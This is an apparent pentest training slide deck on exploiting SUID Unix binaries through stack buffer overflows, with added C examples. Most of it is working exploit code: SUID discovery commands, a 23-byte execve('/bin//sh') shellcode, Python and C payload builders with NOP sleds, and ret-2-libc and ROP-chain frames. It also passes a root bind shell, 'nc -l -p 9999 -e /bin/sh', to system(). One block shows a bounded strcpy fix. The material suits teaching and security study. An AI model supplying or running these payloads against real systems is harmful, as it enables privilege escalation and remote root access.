UNIX EXECUTABLE
EXPLOITATION
Ammarit Thongthua
<ShellCodeNoobx Es>
#whoami
<Name>
Ammarit Thongthua
Mr. K
ShellCodeNoob
</Name>
<Profile>
Pentest team leader in a private company
</Profile>
FB : Ammarit Es Shellcodenoob
“There are some relationships between
- Reverse Engineering
- Buffer overflow
- Shellcode
They are the complement of each other”
“Sleepy Kama”
#Inspiration
Today, we will start with
AGENDA
- Introduction
- Vulnerable Unix executable
- Memory space and stack layout
- Buffer overflow
- Unix application basic reverse engineering
- Shellcode
- Protection vs exploitation
- Basic stack without protection
- Bypass password protection
- Exploit to get root privilege
- Limited stack space
- StackGuard (canary)
- Non-executable stack (NX)
- ROP chain
- Address Space Layout Randomization (ASLR)
- Defeat with static system library (kernel < 2.6.20)
- ASLR with the static system library removed
- Defeat with application wrapping (kernel >= 2.6.20)
- Compare with Windows exploitation
Chapter I
“Vulnerable Unix Application”
VULNERABLE UNIX APPLICATION
- Owned by "root" as user or group
- SUID or SGID bit is set (an "s" in place of the execute bit in ls -l)
- Together these two criteria turn a memory-corruption bug into privilege escalation to root: whatever code we make the program run executes with its effective UID/GID
- Find candidates:
list="$(find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null)"; for i in $list; do ls -al "$i"; done
ls -lR / 2>/dev/null | grep "wsr" | grep "root"
- Uses an unsafe standard-library function on attacker-controlled input
- Ex: strcpy(), gets(), sprintf(), vsprintf()
- None of them bound the write by the size of the destination buffer, so oversized input overflows it; the visible symptom is usually a segmentation fault
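Added example, not code from the original slides: a checkpw() in the shape the deck builds on (a 608-byte stack buffer filled by strcpy() from the input line) beside a bounded version that refuses oversized input instead of truncating it silently. The password "secret", the return codes and the function names are assumptions made here for illustration.

```c
/* Added example (not from the original slides): vulnerable checkpw()
 * versus a bounded one. Assumed password "secret"; assumed return codes
 * 1 = ok, 0 = wrong, -1 = input too long. */
#include <stdio.h>
#include <string.h>

#define PW_BUF 608

/* Vulnerable pattern: strcpy() copies until the NUL in the input, so
 * anything longer than 607 bytes runs past pw[] into SFP and RP. */
int checkpw_unsafe(const char *input)
{
    char pw[PW_BUF];
    strcpy(pw, input);                 /* no bound: stack buffer overflow */
    return strcmp(pw, "secret") == 0;
}

/* Bounded version: check the length against the buffer first, copy with
 * an explicit limit and terminate. */
int checkpw_bounded(const char *input)
{
    char pw[PW_BUF];
    size_t n = strlen(input);
    if (n >= sizeof pw)
        return -1;                     /* would overflow: refuse */
    memcpy(pw, input, n);
    pw[n] = '\0';
    return strcmp(pw, "secret") == 0;
}

/* Feed n bytes of 'A' to the bounded checker, the way a manual overflow
 * test would (n capped at the scratch buffer size). */
int feed_bounded(size_t n)
{
    static char scratch[4096];
    if (n >= sizeof scratch) n = sizeof scratch - 1;
    memset(scratch, 'A', n);
    scratch[n] = '\0';
    return checkpw_bounded(scratch);
}

/* Stand-alone driver: read one line from stdin like the demo binary. */
int main(void)
{
    char line[4096];
    if (!fgets(line, sizeof line, stdin))
        return 1;
    line[strcspn(line, "\n")] = '\0';
    int r = checkpw_bounded(line);
    puts(r == 1 ? "access granted" : r == 0 ? "wrong password" : "input too long");
    return r == 1 ? 0 : 1;
}
```

The bounded version is what the later "pattern test" slides are looking for in reverse: with strcpy() the 608th byte of input already lands on the saved frame pointer; with the length check the program answers "input too long" at that point instead of crashing.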
Chapter II
“Memory Address and Stack Layout”
MEMORY ADDRESS AND STACK LAYOUT
Process memory layout (32-bit; high addresses at the top):
0xFFFFFFFF
   Stack          (grows down, toward lower addresses)
   ...
   Heap           (grows up, toward higher addresses)
   BSS segment    (uninitialised globals)
   Data segment   (initialised globals)
   Code segment   (.text)
0x00000000
MEMORY ADDRESS AND STACK LAYOUT
main ()
{
    int i = 0;
    checkpw ();
}

checkpw ()
{
    char pw[608];
    ...
}
MEMORY ADDRESS AND STACK LAYOUT
Stack while checkpw() is running (high addresses at the top):
0xFFFFFFFF
            Previous stack frames
 main()     int i = 0;
            .....
            RP    return pointer: the address in main() to resume at after checkpw() returns (pushed by the call)
 checkpw()  SFP   saved frame pointer of main() (pushed by the prologue of checkpw())
 ESP ->     char pw[608];
0x00000000
Writing past the end of pw[608] runs upward into SFP and then into RP.
Chapter III
“Stack buffer overflow”
BUFFER OVERFLOW
- The situation when the data fed to the program is larger than the buffer declared to hold it
Ex: char pw[608];
AAAAAAAAAA....[607 of A]....AAA\x00 | SFP | RP        <- fits: 607 bytes plus the terminator
AAAAAAAAAA....[616 of A]....AAAAAAAAAAAAAA\x00        <- 608 + 4 + 4: both saved values overwritten
SFP = 0x41414141
***RP = 0x41414141
“Segmentation fault”
“Illegal Instruction”
“How can we detect a buffer overflow in a Unix application?”
“Generally, by manual testing: feed longer and longer input until it crashes”
BUFFER OVERFLOW
“Better way: use a cyclic pattern, so the value in the crash tells us the offset”
BUFFER OVERFLOW
/usr/share/metasploit-framework/tools/pattern_create.rb 1000
- Feed the 1000-byte pattern to the program and read EIP from the crash in GDB
- Check buffer overflow position: every 4-byte window of the pattern is unique, so the EIP value (here 0x41347541, the bytes "Au4A" in memory) maps to exactly one offset, the distance from the start of the buffer to the return pointer
/usr/share/metasploit-framework/tools/pattern_offset.rb 41347541
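Added example, not part of the original slides: a C re-implementation of what pattern_create.rb and pattern_offset.rb do, so the offset can be recovered without Metasploit installed. The pattern layout (triplets of A-Z, a-z, 0-9, "Aa0Aa1Aa2...") is the Metasploit one; the function names are my own. Note that EIP is read back as a little-endian dword, so its bytes are in reverse order relative to where they sit in the pattern.

```c
/* Added example (not from the original slides): cyclic pattern generator
 * and offset finder equivalent to pattern_create.rb / pattern_offset.rb.
 * Function names are my own. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill out[] with the first len bytes of "Aa0Aa1Aa2...Aa9Ab0Ab1...":
 * 3-byte units, 26*26*10 = 6760 of them, so every 4-byte window is
 * unique for patterns up to 20280 bytes. */
void pattern_create(char *out, size_t len)
{
    size_t pos = 0;
    for (char a = 'A'; a <= 'Z' && pos < len; a++)
        for (char b = 'a'; b <= 'z' && pos < len; b++)
            for (char c = '0'; c <= '9' && pos < len; c++) {
                char unit[3] = { a, b, c };
                for (int k = 0; k < 3 && pos < len; k++)
                    out[pos++] = unit[k];
            }
}

/* Given the crashed EIP value and the pattern length that was sent,
 * return the offset of those 4 bytes in the pattern, or -1 if absent.
 * The dword is converted back to memory order (little-endian) first. */
long pattern_offset(uint32_t eip, size_t len)
{
    char *pat = malloc(len);
    if (!pat) return -1;
    pattern_create(pat, len);
    unsigned char needle[4] = { eip & 0xff, (eip >> 8) & 0xff,
                                (eip >> 16) & 0xff, (eip >> 24) & 0xff };
    long found = -1;
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) { found = (long)i; break; }
    free(pat);
    return found;
}

int main(int argc, char **argv)
{
    /* ./pattern 1000            -> print the 1000-byte pattern
       ./pattern 1000 41347541   -> print the offset of that EIP value */
    if (argc < 2) return 1;
    size_t len = strtoul(argv[1], NULL, 10);
    if (argc == 2) {
        char *p = malloc(len);
        if (!p) return 1;
        pattern_create(p, len);
        fwrite(p, 1, len, stdout);
        putchar('\n');
        free(p);
    } else {
        printf("%ld\n", pattern_offset((uint32_t)strtoul(argv[2], NULL, 16), len));
    }
    return 0;
}
```

For the deck's crash value 0x41347541 the result is 612, which is exactly 608 bytes of pw[] plus the 4-byte saved frame pointer: the return pointer starts at byte 612 of the input.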
BUFFER OVERFLOW
“What happens if we can overwrite the return pointer?”
“Can we control the flow of execution?”
“Yes”
AAAAAAAAAAAAA….[612 of A]….AAAAAAA | RP = 0x080484c7
SFP = 0x41414141
***RP = 0x080484c7   <- an address of our choosing inside the program's own code (for the password bypass: the code path taken after a successful check)
No “Segmentation fault” / “Illegal Instruction” this time: when checkpw() returns, execution continues at 0x080484c7
Demo #1
GDB and bypass password protection
Chapter IV
“Basic Shellcode”
“Imagine if we could point the return pointer at our own instructions”
“Then we control what the process does, with the privileges it runs with”
SHELL CODE
[Malicious machine opcode] + AAAAAAAAAAAAAAA | SFP | RP = 0xFBFF0544
SFP = 0x41414141
***RP = 0xFBFF0544   <- the stack address where our opcode landed
- The attacker controls the return pointer to run malicious machine opcode placed in memory (shellcode)
- Inserting the shellcode as part of the same input keeps the exploit simple: one write delivers both the code and the pointer to it
SHELL CODE
- Shellcode is the code the attacker wants the target to run in order to carry out the attacker's command (written in assembly and assembled to opcode)
- Ex:
  - Open a port that gives a connection to the system with root privilege
  - Add a user to the system
  - Run a shell with root privilege
- Shellcode is written down as a string of hexadecimal bytes
“What happens if we make the return pointer run a system call that executes /bin/sh, in a program running as root?”
“We get a shell prompt with root privileges”
SHELL CODE
Shellcode: execve("/bin//sh") system call, 23 bytes, no NUL bytes
Op code          Assembly code (Intel syntax)
31 C0            xor  eax, eax        ; eax = 0 without a 00 byte in the opcode
50               push eax             ; 0000: NUL terminator of the string
68 2F 2F 73 68   push 0x68732f2f      ; "//sh" (doubled slash pads it to 4 bytes)
68 2F 62 69 6E   push 0x6e69622f      ; "/bin"
89 E3            mov  ebx, esp        ; ebx = pointer to "/bin//sh" (arg 1: filename)
50               push eax             ; NULL end of argv[]
53               push ebx             ; argv[0] = "/bin//sh"
89 E1            mov  ecx, esp        ; ecx = argv (arg 2)
B0 0B            mov  al, 0x0b        ; system call number 11 = execve
CD 80            int  0x80            ; enter the kernel
Stack as the shellcode leaves it ($esp at the top):
$esp ->  /bin
         //sh
         0000
Caveat: this 23-byte version never sets edx (arg 3, envp); it relies on edx already holding NULL or a usable pointer when the shellcode starts.
SHELL CODE
Vulnerable program running as “root” -> overwritten RP -> shellcode -> execve(“/bin//sh”) as root
We get /bin/sh as root
“How can we get shellcode?”
- Where do we get shellcode to build an exploit?
  - Write your own (takes time)
  - Generate it with Metasploit
  - Meterpreter
  - Search the internet:
    - shell-storm.org/shellcode
    - packetstormsecurity.com
    - www.exploit-db.com/exploits
SHELL CODE
“How can we manually create shellcode?”
“Good news: you need to understand assembly first!!”
https://defuse.ca/online-x86-assembler.htm#disassembly
SHELL CODE
“How can we know what a piece of shellcode does?”
“Good news again: you need to understand assembly first!!”
http://www2.onlinedisassembler.com/odaweb/
SHELL CODE
“Can you see a difference between the assembly from the debugger and the output from the websites?”
ASSEMBLY CODE
From our debugger | From our web disassembly
What's wrong?
Nothing wrong.. it is the same instructions written in a different syntax
ASSEMBLY CODE
From our debugger: AT&T syntax (GDB's default; source operand before destination, % on registers, $ on immediates)
From our web disassembly: Intel syntax (destination operand before source)
GDB can show Intel syntax too: set disassembly-flavor intel
Chapter V
“Make exploit payload”
EXPLOIT PAYLOAD
[Shell code] + [PADDING to make the size 612] | SFP | RP = 0xBFFFF528
SFP = 0x41414141
***RP = 0xBFFFF528   <- the stack address where the shellcode (the start of the buffer) sits
Payload = Shellcode + PAD + RP
          [ 612 bytes          ] [4 bytes]
Example:
- Where does the shellcode start in memory (for this example case)?
- Need to reverse engineer and debug the program: read the buffer's address in GDB
EXPLOIT PAYLOAD
exp.py (Python 2):
scode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
         "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")   # execve("/bin//sh"), 23 bytes
RP = "\x20\xf5\xff\xbf"                                   # 0xbffff520 written little-endian!!!
PAYLOAD = scode + "A" * (612 - len(scode)) + RP            # RP must land exactly at offset 612
print PAYLOAD
-----------------------------------------------------------------------------------------------
user@host:$ python exp.py | ./vul_app
EXPLOIT PAYLOAD
“Let's try our payload”
EXPLOIT PAYLOAD
- Sometimes the result of our exploit is a crash!!!
“What's wrong in our PAYLOAD ^^?”
EXPLOIT PAYLOAD
- The buffer's address when running under the debugger and when running the exploit directly may differ by a few bytes (environment variables and argv sit above the stack, so every frame shifts)
[Shell code] + [PADDING to make the size 612] | 0xBFFFF528
“How can we solve this problem?”
[ Shell code ] + [ 577 bytes of PADDING ] | 0xBFFFF528   <- a return a few bytes off lands in the middle of the shellcode (or before it) and crashes
EXPLOIT PAYLOAD
[400 B. landing space] + [Shell code] + [PADDING to make the size 612] | 0xBFFFF540
NOP (\x90) = do nothing. The CPU slides through the NOPs until it reaches the shellcode, so RP only has to land somewhere inside the 400-byte sled instead of on one exact byte
exp.py (Python 2):
scode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
         "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
RP = "\x58\xf5\xff\xbf"                                   # 0xbffff558, inside the NOP sled
exp = "\x90" * 400 + scode + "A" * (612 - 400 - len(scode)) + RP
print exp
-----------------------------------------------------------------------------------------------
user@host:$ python exp.py | ./vul_app
EXPLOIT PAYLOAD
“Let's try our improved payload”
EXPLOIT CODE
- When the exploit succeeds: a shell prompt as root
Demo #2
Exploit to get root privilege
Chapter VI
“Buffer overflow in limited stack space”
LIMITED STACK SPACE
When the buffer is smaller than the shellcode, the shellcode bytes themselves run over SFP and RP:
Payload = \x31\x57\xdf\x45\x98\xce\x55\xed\x78\xed\xed\x57\x76\x23\x12\x6f\xf3\x6e\x4a
SFP = 0x12237657     (payload bytes 12-15, read little-endian)
***RP = 0x4a6ef36f   (payload bytes 16-19)
“Segmentation fault”
“Illegal Instruction”
“How can we solve this problem?”
LIMITED STACK SPACE
Put the code after the return pointer instead, where the stack has room:
AAAAAAAAAAAAA…[612 of A]…AAAAAAAA | SFP | RP | [NOP space (NOP sled)] + [S h e l l c o d e]
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (we don't know yet: it must point into the NOP sled that now sits above the return pointer)
- If the buffer is too small, place the shellcode somewhere else on the stack (here: in the same input, just past RP) and point RP at it
LIMITED STACK SPACE
***RP = 0xBFFFF7B0   (an address inside the NOP sled, read in the debugger)
exp.py (Python 2):
scode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
         "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
RP = "\xb0\xf7\xff\xbf"                                   # 0xbffff7b0, little-endian
exp = "A" * 612 + RP + "\x90" * 400 + scode
print exp
-----------------------------------------------------------------------------------------------
user@host:$ python exp.py | ./vul_app
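Added example, not code from the original slides: a C payload builder for the two layouts used in the "EXPLOIT PAYLOAD" and "LIMITED STACK SPACE" chapters, as an alternative to the python one-liners. Layout A puts [NOP sled][shellcode][pad] before the return pointer; layout B puts [pad] before it and [NOP sled][shellcode] after it. The offset 612 (608-byte buffer plus the 4-byte saved frame pointer), the 23-byte shellcode and the return addresses are the deck's; the function names and the assumption that the input is delivered by a NUL-stopping copy (so the payload must not contain 0x00) are mine.

```c
/* Added example (not from the original slides): build the two stack
 * payload layouts from the deck and refuse ones a strcpy()-style copy
 * would truncate. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof shellcode - 1)
#define RP_OFFSET 612     /* from the start of pw[] to the saved return pointer */

/* Write a dword as the 4 little-endian bytes the CPU expects on the stack. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = v & 0xff;         dst[1] = (v >> 8) & 0xff;
    dst[2] = (v >> 16) & 0xff; dst[3] = (v >> 24) & 0xff;
}

/* A NUL anywhere stops the copy, so the rest of the payload never lands. */
static long check_null_free(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0) return -1;
    return (long)len;
}

/* Layout A: [sled][shellcode][pad to 612][RP]. rp points into the sled.
 * Returns the payload length, or -1 if it does not fit or contains NUL. */
long build_payload_before_rp(unsigned char *out, size_t outlen, size_t sled,
                             const unsigned char *sc, size_t sclen, uint32_t rp)
{
    if (sled + sclen > RP_OFFSET || outlen < RP_OFFSET + 4) return -1;
    memset(out, 0x90, sled);
    memcpy(out + sled, sc, sclen);
    memset(out + sled + sclen, 'A', RP_OFFSET - sled - sclen);
    put_le32(out + RP_OFFSET, rp);
    return check_null_free(out, RP_OFFSET + 4);
}

/* Layout B: [pad to 612][RP][sled][shellcode]. The code now sits above the
 * saved return pointer, so rp must be a stack address above the frame. */
long build_payload_after_rp(unsigned char *out, size_t outlen, size_t sled,
                            const unsigned char *sc, size_t sclen, uint32_t rp)
{
    size_t total = RP_OFFSET + 4 + sled + sclen;
    if (outlen < total) return -1;
    memset(out, 'A', RP_OFFSET);
    put_le32(out + RP_OFFSET, rp);
    memset(out + RP_OFFSET + 4, 0x90, sled);
    memcpy(out + RP_OFFSET + 4 + sled, sc, sclen);
    return check_null_free(out, total);
}

int main(int argc, char **argv)
{
    /* ./mkpayload before | ./vul_app      or      ./mkpayload after | ./vul_app */
    unsigned char buf[4096];
    long n = (argc > 1 && strcmp(argv[1], "after") == 0)
        ? build_payload_after_rp(buf, sizeof buf, 400, shellcode, SHELLCODE_LEN, 0xbffff7b0u)
        : build_payload_before_rp(buf, sizeof buf, 400, shellcode, SHELLCODE_LEN, 0xbffff558u);
    if (n < 0) { fprintf(stderr, "payload does not fit or contains a NUL byte\n"); return 1; }
    fwrite(buf, 1, (size_t)n, stdout);
    return 0;
}
```

The NUL check is the caveat that bites most often in practice: a return address such as 0x08048400 looks fine in the debugger but its low byte is 0x00, so a strcpy()-delivered payload would end right there.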
LIMITED STACK SPACE
- When the exploit succeeds: a shell prompt as root
Demo #3
Exploit to get root privilege with limited stack space
LIMITED STACK SPACE
SUMMARY
Grant() main() AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP                        <- bypass password protection: RP points back into the program
\x90\x90\x90\x90\x90 + [Shell code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP       <- shellcode in the buffer: RP points into the NOP sled
AAAAAAAAAAAAAAAAAAAAAAAAAAA RP \x90\x90\x90\x90\x90\x90\x90 + [Shell code]           <- limited stack space: shellcode placed after RP
- Bypass password protection
- Buffer overflow to run shellcode and get root privilege
- Buffer overflow to run shellcode with limited stack space
“Is it this easy in real life?”
“No..”
Chapter VII
“Ret-2-libc”
“What is Ret-2-libc?”
- Characteristics of the vulnerable program
  - SUID or SGID set
  - Can be overflowed
  - Uses libc (so system() is already mapped into the process)
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
“What happens if we make RP jump into libc's system() and run?”
system("nc -l -p 9999 -e /bin/sh")
- Fool the program into calling system() with an evil command string: the input carries no code at all, only addresses, so a small buffer (or a non-executable stack) no longer matters
- If arg = “nc -l -p 9999 -e /bin/sh” and the program runs as “root”, then “nc -l -p 9999 -e /bin/sh” runs as “root”
AAAAAAAAAAAAA | SFP | RP = system | return address for system() | arg -> “nc -l -p 9999 -e /bin/sh”
Layout check: after the overwritten RP is popped by ret, system() starts with ESP pointing at the next dword, which it treats as its own return address; its argument is the dword after that one
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
- Find the address of the system() function (in GDB: p system)
- Create the “evil” argument as an environment variable (export NC="nc -l -p 9999 -e /bin/sh") and find the address of that string on the stack
AAAAAAAAAAAAA | SFP | RP = \xf0\x4e\xec\xb7 (system = 0xb7ec4ef0) | return slot | \x98\xfa\xff\xbf (0xbffffa98 = address of the NC string)
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
- Result: when the exploit succeeds, nc listens on port 9999 and hands a root /bin/sh to whoever connects
Demo #4
Exploit to get root privilege with ret-2-libc style
Chapter VIII
“ROP Chaining”
- The limitation of ret-2-libc: only one command per exploit, because once system() returns there is nothing useful left on the stack to return into
AAAAAAAAAAAAA | SFP | RP = system (\xf0\x4e\xec\xb7) | return slot | arg1 (\x98\xfa\xff\xbf -> NC)
ROP CHAIN
“It's better if we can run more than one command in one exploit”
“Let's improve ret-2-libc into ROP chaining”
- The return slot of each system() call is the place to chain. Instead of a dead address, put the address of a “pop <reg>; ret” gadget (any such byte sequence in the binary or in libc): when system() returns into it, the pop discards the consumed argument and the ret transfers control to the next system() address on the stack
AAAAAAAAAAAAA | SFP | system | pop;ret | arg1 | system | pop;ret | arg2 | ... | exit
- Execution order: ret -> system(arg1) -> pop;ret (drops arg1) -> system(arg2) -> pop;ret (drops arg2) -> ... -> exit()
- Every step is the same 3-dword unit [function][gadget][argument]; the chain is as long as the overflow allows
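Added example, not code from the original slides: a builder for the ret-2-libc frame of Chapter VII and for its ROP-chained extension above. The system() address 0xb7ec4ef0 and the NC string address 0xbffffa98 are the ones shown on the deck's slide; the "pop; ret" gadget address, the exit() address and the second argument address are made-up placeholders that an attacker would read from the debugger. Offset 612 is the deck's; the function names are mine.

```c
/* Added example (not from the original slides): ret-2-libc frame and
 * ROP chain layout. Gadget/exit/arg2 addresses are placeholders. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RP_OFFSET 612      /* from the start of pw[] to the saved return pointer */

static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = v & 0xff;         dst[1] = (v >> 8) & 0xff;
    dst[2] = (v >> 16) & 0xff; dst[3] = (v >> 24) & 0xff;
}

/* Single call: [pad][system][ret_after][arg]. ret_after is what system()
 * returns into; pointing it at exit() ends the process cleanly instead of
 * crashing once the command finishes. Returns the payload length. */
long build_ret2libc(unsigned char *out, size_t outlen, uint32_t system_addr,
                    uint32_t ret_after, uint32_t arg_addr)
{
    if (outlen < RP_OFFSET + 12) return -1;
    memset(out, 'A', RP_OFFSET);
    put_le32(out + RP_OFFSET, system_addr);
    put_le32(out + RP_OFFSET + 4, ret_after);
    put_le32(out + RP_OFFSET + 8, arg_addr);
    return RP_OFFSET + 12;
}

/* Chain of n calls: [pad] then for each argument [system][pop_ret][arg],
 * closed by [exit]. pop_ret is a "pop <reg>; ret" gadget: it removes the
 * argument that system() just consumed, so the following dword (the next
 * system address) becomes the next return target. */
long build_rop_chain(unsigned char *out, size_t outlen, uint32_t system_addr,
                     uint32_t pop_ret, uint32_t exit_addr,
                     const uint32_t *args, size_t n)
{
    size_t need = RP_OFFSET + n * 12 + 4;
    if (n == 0 || outlen < need) return -1;
    memset(out, 'A', RP_OFFSET);
    unsigned char *p = out + RP_OFFSET;
    for (size_t i = 0; i < n; i++) {
        put_le32(p, system_addr);
        put_le32(p + 4, pop_ret);
        put_le32(p + 8, args[i]);
        p += 12;
    }
    put_le32(p, exit_addr);        /* system() of the last arg returns into exit() */
    return (long)need;
}

/* Read back dword number index of the chain (0 = the overwritten RP). */
uint32_t chain_word(const unsigned char *buf, size_t index)
{
    const unsigned char *p = buf + RP_OFFSET + 4 * index;
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

int main(void)
{
    /* ./mkchain | ./vul_app : two system() calls, then exit() */
    unsigned char buf[2048];
    uint32_t args[2] = { 0xbffffa98u,    /* NC string, from the deck's slide */
                         0xbffffab0u };  /* placeholder: a second env string */
    long n = build_rop_chain(buf, sizeof buf,
                             0xb7ec4ef0u,   /* system(), from the deck's slide */
                             0x0804851cu,   /* placeholder: pop ebx; ret gadget */
                             0xb7ec1234u,   /* placeholder: exit() */
                             args, 2);
    if (n < 0) return 1;
    fwrite(buf, 1, (size_t)n, stdout);
    return 0;
}
```

Reading the chain back with chain_word() is a cheap sanity check before sending it: dword 1 of a plain ret-2-libc frame must be the return slot, not the argument, and in the chained form every third dword must be the gadget.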